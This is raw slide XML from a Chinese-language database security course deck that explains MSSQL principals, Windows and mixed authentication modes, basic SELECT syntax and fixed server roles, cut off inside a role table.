              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>页</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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2711451" y="3728369"/>
            <a:ext cx="6804025" cy="1932879"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>数据库安全</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="64C100"/>
              </a:solidFill>
              <a:cs typeface="Adobe 黑体 Std R"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13315" name="Picture 4" descr="E:\公司素材\公司LOGO\透明.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95251"/>
            <a:ext cx="1651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18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8185026" y="5877272"/>
            <a:ext cx="230346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marL="12700" indent="-12700"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110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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主讲：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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4896544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>主体</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>    主体是可以请求对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>资源访问权限的实体，包括用户、组或进程。主体有以下特征：每个主体都有自己的安全标识号（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>），每个主体有一个作用域，作用域基于定义主体的级别，主体可以是主体的集合（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>组）或者不可分割的主体（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>登录名）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>     Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>级别的主体包括：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>域登录名和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>本地登录名；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>级别的主体包括：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>登录名和服务器角色；数据库级别的主体包括：数据库用户、数据库角色，以及应用程序角色。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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基本安全术语</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98737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839416" y="1484784"/>
            <a:ext cx="10972800" cy="4896544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>身份验证模式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>身份验证模式：一般情况下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>数据库系统都运行在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>服务器上，作为一个网络操作系统，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>本身就提供账号的管理和验证功能。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>验证模式利用了操作系统用户安全性和账号管理机制，允许</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>的用户名和口令。在这种模式下，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>把登录验证的任务交给了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>操作系统，用户只要通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>的验证，就可以连接到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>服务器。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>身份验证模式可以获得最佳工作效率，在这种模式下，域用户不需要独立的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>账户和密码就可以访问数据库。如果用户更新了自己的域密码，也不必更改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>的密码，但是该模式下用户要遵从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>安全模式的规则。默认情况下，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>身份验证模式，即本地账号来登录。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>混合模式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>（混合）身份验证模式：使用混合模式登录时，可以同时使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>身份验证和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>身份验证。如果用户使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>TCP/IP Sockets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>进行登录验证，则使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>身份验证；如果用户使用命名管道，则使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>身份验证。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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安全验证方式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156904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839416" y="1484784"/>
            <a:ext cx="10972800" cy="4896544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查询语句的基本用法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SELECT {ALL | DISTINCT } *| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>别名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>别名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>[TOP n [PERCENT]]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>[INTO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>表名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>别名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>别名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>｛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>条件｝</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>｛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>GROUP BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>分组条件 ｛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>HAVING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>分组条件｝｝</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>｛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>排序字段 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>ASC | DESC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>｝</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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查询语句</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37018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服务器角色</a:t>
            </a:r>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700808"/>
            <a:ext cx="3470176" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>服务器角色可以授予服务器管理的能力，服务器角色的权限作用域为服务器范围。用户可以向服务器角色中添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>登录名、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>账户和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>组。固定服务器角色的每个成员都可以向其所属角色添加其他登录名。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>对象资源管理器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>窗口中，依次打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>安全性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】➤【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>服务器角色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>节点，即可看到所有的固定服务器角色</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="表格 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FE6FF06-25FE-46EB-9807-C1F236BD255E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3285129700"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4079776" y="1302422"/>
          <a:ext cx="7920880" cy="485086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3107792337"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6048672">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3339334475"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>服务器角色名称</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                        <a:t>角色说明</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1017786181"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="445663">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
